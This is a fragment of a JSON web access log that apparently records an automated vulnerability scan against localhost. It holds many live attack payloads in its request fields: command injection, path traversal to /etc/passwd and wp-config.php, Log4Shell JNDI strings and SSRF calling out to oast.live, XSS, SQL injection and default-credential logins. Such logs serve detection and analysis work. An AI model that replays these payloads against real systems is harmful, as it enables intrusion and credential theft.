WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/3 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-setup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /express-graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/data?chart=system.cpu&format=json&points=125&group=average>ime=0&options=ms%7Cflip%7Cjsonwrap%7Cnonzero&after=-120&dimensions=iowait HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"{\x22type\x22:\x22index\x22,\x22spec\x22:{\x22type\x22:\x22index\x22,\x22ioConfig\x22:{\x22type\x22:\x22index\x22,\x22firehose\x22:{\x22type\x22:\x22http\x22,\x22uris\x22:[\x22 file:///etc/passwd \x22]}},\x22dataSchema\x22:{\x22dataSource\x22:\x22sample\x22,\x22parser\x22:{\x22type\x22:\x22string\x22, \x22parseSpec\x22:{\x22format\x22:\x22regex\x22,\x22pattern\x22:\x22(.*)\x22,\x22columns\x22:[\x22a\x22],\x22dimensionsSpec\x22:{},\x22timestampSpec\x22:{\x22column\x22:\x22no_ such_ column\x22,\x22missingValue\x22:\x222010-01-01T00:00:00Z\x22}}}}},\x22samplerConfig\x22:{\x22numRows\x22:500,\x22timeoutMs\x22:15000}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /druid/indexer/v1/sampler?for=connect HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pyproject.toml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /eam/vib?id=/etc/issue HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /names.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /home.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /os/mxperson HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /action/usermanager.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mantis/verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/%2F.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/taskProc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /documentation HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"_charset_=utf-8&j_username=aparker@geometrixx.info&j_password=aparker&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/4 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /deploy.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/data.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graph HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=/admin/Index/index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Umbraco/feedproxy.aspx?url=http://ca28fg0smpvbd3qg07h0pi6mrf5r37qsu.oast.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.netrc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /css_parser.php?css=css_parser.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/home.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /meaweb/os/mxperson HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug.seam HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wsdl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mantisBT/verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWeb/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /documentation/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/node_info.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aws.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graph_cms HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /session HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /LetsEncrypt/Index?fileName=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"email='+or+2>1+--+&password=&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /scrm/crm/admin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"{\x22userName\x22:\x22admin\x22,\x22password\x22:\x22cs141-snmp\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_netrc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.027","http_user_agent":"${jndi:ldap://127.0.0.1#.${hostName}.useragent.ca28fg0smpvbd3qg07h0w1qcq5o6r6ssn.oast.live}", "http_referer":"${jndi:ldap://127.0.0.1#.${hostName}.referer.ca28fg0smpvbd3qg07h0apwnkfkcp9kr8.oast.live}", "request_method":"GET", "http_x_forwarded_for":"${jndi:ldap://127.0.0.1#.${hostName}.xforwardedfor.ca28fg0smpvbd3qg07h0srwf4wunokdnm.oast.live}"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /creaprezzi.php?prezzoperiodo4=%22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /RASHTML5Gateway/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/File/DownloadFile?filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd&delete=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mantisbt-2.3.0/verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/..;/css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWeb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /healthz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server/sdk/rest/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like 